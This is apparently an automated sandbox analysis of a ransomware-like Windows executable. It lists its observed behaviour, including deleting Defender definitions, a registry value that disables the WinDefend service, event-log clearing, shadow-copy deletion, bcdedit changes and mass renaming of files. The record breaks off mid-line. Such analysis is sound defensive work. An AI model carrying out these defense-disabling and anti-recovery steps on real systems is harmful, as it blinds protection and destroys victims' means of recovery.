Analysis
-
max time kernel
32s -
max time network
143s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 13:26
Static task
static1
Behavioral task
behavioral1
Sample
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
Resource
win10-en-20211208
General
-
Target
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
-
Size
3.7MB
-
MD5
ed582a5d8711beaddf0e78f115caca61
-
SHA1
bfd3d499cdb1d43d1647f09d481795ee022f944e
-
SHA256
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687
-
SHA512
b43813d220a2f6ec38ec6d301d39e65c5e38517d8d6ea76589833dd58d38bcf40204ce042a6c2b38e248408dbde8560aba33556c5801ea2fa88defe6c76274f3
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2804 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3256 bcdedit.exe 4024 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exedescription ioc process File opened for modification C:\Program Files\7-Zip\Lang\cy.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-pl.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__JgAAACYAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MAAAADAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-fallback.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__BAAAAAQAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-ppd.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription1-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-compat.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__DgAAAA4AAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MgAAADIAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Grace-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NgAAADYAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\7-Zip\History.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgeCalls.c.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Shades of Blue.htm df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__HAAAABwAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\mip.exe.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__DgAAAA4AAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__EgAAABIAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__FgAAABYAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__MAAAADAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AgAAAAIAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_ja.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__IAAAACAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__KgAAACoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__PAAAADwAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__GgAAABoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\OrangeCircles.jpg df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\mshwLatin.dll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\sRGB.pf.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.concurrent_1.1.0.v20130327-1442.jar.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__OgAAADoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-spi-actions.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-api.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__NAAAADQAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__GgAAABoAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AgAAAAIAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.sq-kfRVf6Yz-4E3whKOcZyZn_oDidJw80msTyw-ejB__AAAAAAAAAAA0.2wfv1 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2992 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exedf2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exepid process 600 powershell.exe 600 powershell.exe 600 powershell.exe 3740 powershell.exe 3740 powershell.exe 3740 powershell.exe 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3692 wevtutil.exe Token: SeBackupPrivilege 3692 wevtutil.exe Token: SeSecurityPrivilege 2268 wevtutil.exe Token: SeBackupPrivilege 2268 wevtutil.exe Token: SeSecurityPrivilege 1016 wevtutil.exe Token: SeBackupPrivilege 1016 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3944 wmic.exe Token: SeSecurityPrivilege 3944 wmic.exe Token: SeTakeOwnershipPrivilege 3944 wmic.exe Token: SeLoadDriverPrivilege 3944 wmic.exe Token: SeSystemProfilePrivilege 3944 wmic.exe Token: SeSystemtimePrivilege 3944 wmic.exe Token: SeProfSingleProcessPrivilege 3944 wmic.exe Token: SeIncBasePriorityPrivilege 3944 wmic.exe Token: SeCreatePagefilePrivilege 3944 wmic.exe Token: SeBackupPrivilege 3944 wmic.exe Token: SeRestorePrivilege 3944 wmic.exe Token: SeShutdownPrivilege 3944 wmic.exe Token: SeDebugPrivilege 3944 wmic.exe Token: SeSystemEnvironmentPrivilege 3944 wmic.exe Token: SeRemoteShutdownPrivilege 3944 wmic.exe Token: SeUndockPrivilege 3944 wmic.exe Token: SeManageVolumePrivilege 3944 wmic.exe Token: 33 3944 wmic.exe Token: 34 3944 wmic.exe Token: 35 3944 wmic.exe Token: 36 3944 wmic.exe Token: SeIncreaseQuotaPrivilege 3956 wmic.exe Token: SeSecurityPrivilege 3956 wmic.exe Token: SeTakeOwnershipPrivilege 3956 wmic.exe Token: SeLoadDriverPrivilege 3956 wmic.exe Token: SeSystemProfilePrivilege 3956 wmic.exe Token: SeSystemtimePrivilege 3956 wmic.exe Token: SeProfSingleProcessPrivilege 3956 wmic.exe Token: SeIncBasePriorityPrivilege 3956 wmic.exe Token: SeCreatePagefilePrivilege 3956 wmic.exe Token: SeBackupPrivilege 3956 wmic.exe Token: SeRestorePrivilege 3956 wmic.exe Token: SeShutdownPrivilege 3956 wmic.exe Token: SeDebugPrivilege 3956 wmic.exe Token: SeSystemEnvironmentPrivilege 3956 wmic.exe Token: SeRemoteShutdownPrivilege 3956 wmic.exe Token: SeUndockPrivilege 3956 wmic.exe Token: SeManageVolumePrivilege 3956 wmic.exe Token: 33 3956 wmic.exe Token: 34 3956 wmic.exe Token: 35 3956 wmic.exe Token: 36 3956 wmic.exe Token: SeIncreaseQuotaPrivilege 3956 wmic.exe Token: SeSecurityPrivilege 3956 wmic.exe Token: SeTakeOwnershipPrivilege 3956 wmic.exe Token: SeLoadDriverPrivilege 3956 wmic.exe Token: SeSystemProfilePrivilege 3956 wmic.exe Token: SeSystemtimePrivilege 3956 wmic.exe Token: SeProfSingleProcessPrivilege 3956 wmic.exe Token: SeIncBasePriorityPrivilege 3956 wmic.exe Token: SeCreatePagefilePrivilege 3956 wmic.exe Token: SeBackupPrivilege 3956 wmic.exe Token: SeRestorePrivilege 3956 wmic.exe Token: SeShutdownPrivilege 3956 wmic.exe Token: SeDebugPrivilege 3956 wmic.exe Token: SeSystemEnvironmentPrivilege 3956 wmic.exe Token: SeRemoteShutdownPrivilege 3956 wmic.exe Token: SeUndockPrivilege 3956 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2380 wrote to memory of 2792 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 2792 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2792 wrote to memory of 3944 2792 net.exe net1.exe PID 2792 wrote to memory of 3944 2792 net.exe net1.exe PID 2380 wrote to memory of 2668 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 2668 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2668 wrote to memory of 3668 2668 net.exe net1.exe PID 2668 wrote to memory of 3668 2668 net.exe net1.exe PID 2380 wrote to memory of 4044 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 4044 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 4044 wrote to memory of 3096 4044 net.exe net1.exe PID 4044 wrote to memory of 3096 4044 net.exe net1.exe PID 2380 wrote to memory of 940 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 940 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 940 wrote to memory of 2932 940 net.exe net1.exe PID 940 wrote to memory of 2932 940 net.exe net1.exe PID 2380 wrote to memory of 2232 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 2232 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2232 wrote to memory of 4020 2232 net.exe net1.exe PID 2232 wrote to memory of 4020 2232 net.exe net1.exe PID 2380 wrote to memory of 3992 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 3992 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 3992 wrote to memory of 4072 3992 net.exe net1.exe PID 3992 wrote to memory of 4072 3992 net.exe net1.exe PID 2380 wrote to memory of 748 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 748 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 748 wrote to memory of 2804 748 net.exe net1.exe PID 748 wrote to memory of 2804 748 net.exe net1.exe PID 2380 wrote to memory of 3408 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 3408 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 3408 wrote to memory of 1188 3408 net.exe net1.exe PID 3408 wrote to memory of 1188 3408 net.exe net1.exe PID 2380 wrote to memory of 668 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 2380 wrote to memory of 668 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe net.exe PID 668 wrote to memory of 428 668 net.exe net1.exe PID 668 wrote to memory of 428 668 net.exe net1.exe PID 2380 wrote to memory of 1164 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 1164 2380 df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe sc.exe PID 2380 wrote to memory of 3320 2380 